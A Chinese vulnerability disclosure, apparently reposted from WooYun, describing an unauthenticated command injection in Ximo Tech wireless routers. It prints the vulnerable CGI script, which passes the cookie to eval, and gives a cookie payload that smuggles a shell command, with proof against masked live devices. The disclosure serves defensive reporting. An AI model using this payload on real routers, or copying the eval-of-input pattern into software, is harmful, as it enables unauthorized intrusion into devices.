神刀安全网

漏洞标题: 西默科技智能无线路由设备命令执行漏洞(无需登录)

漏洞详情

披露状态:

2016-02-26: 细节已通知厂商并且等待厂商处理中
2016-02-29: 厂商已经确认,细节仅向厂商公开
2016-03-03: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-04-24: 细节向核心白帽子及相关领域专家公开
2016-05-04: 细节向普通白帽子公开
2016-05-14: 细节向实习白帽子公开
2016-05-29: 细节向公众公开

简要描述:

西默科技智能无线路由设备命令执行漏洞(无需登录)

详细说明:

该漏洞影响西默科技多个型号的无线路由,包括但不限于XMSWR-W16、XMSWR-W18M、XMSWR-W15

使用量非常多,如图:

漏洞标题:  西默科技智能无线路由设备命令执行漏洞(无需登录)

该漏洞存在于如下文件:

code 区域
/cgi-bin/checkCookie

漏洞代码为:

code 区域
#!/bin/sh
printf "content-type:text/html;
cache-control:no-cache

"
eval $(echo ${HTTP_COOKIE});
if [ "${login}" = "login" ]; then
if [ "${cmd}" = "check" ]; then
exit 0
fi
echo "<meta http-equiv=/"refresh/" content=/"0;url=/home.htm/" />";
else
#echo "<meta http-equiv=/"refresh/" content=/"0;url=/login.htm/" />";
echo "<script>parent.window.location.href=/"/login.htm/"</script>";
fi

HTTP_COOKIE参数进入了eval函数,造成了漏洞

为了方便测试,只需要访问:

code 区域
/cgi-bin/checkCookie
加上Cookie:login=login|ifconfig>/etc_ro/web/wy.txt

漏洞证明:

该系统大量使用,选取个别做漏洞证明

**.**.**.**/cgi-bin/checkCookie

成功执行后,即可在根目录生成wy.txt

code 区域
**.**.**.**/wy.txt

漏洞标题:  西默科技智能无线路由设备命令执行漏洞(无需登录)

**.**.**.**/login.htm

code 区域
**.**.**.**/wy.txt

漏洞标题:  西默科技智能无线路由设备命令执行漏洞(无需登录)

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 西默科技智能无线路由设备命令执行漏洞(无需登录)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址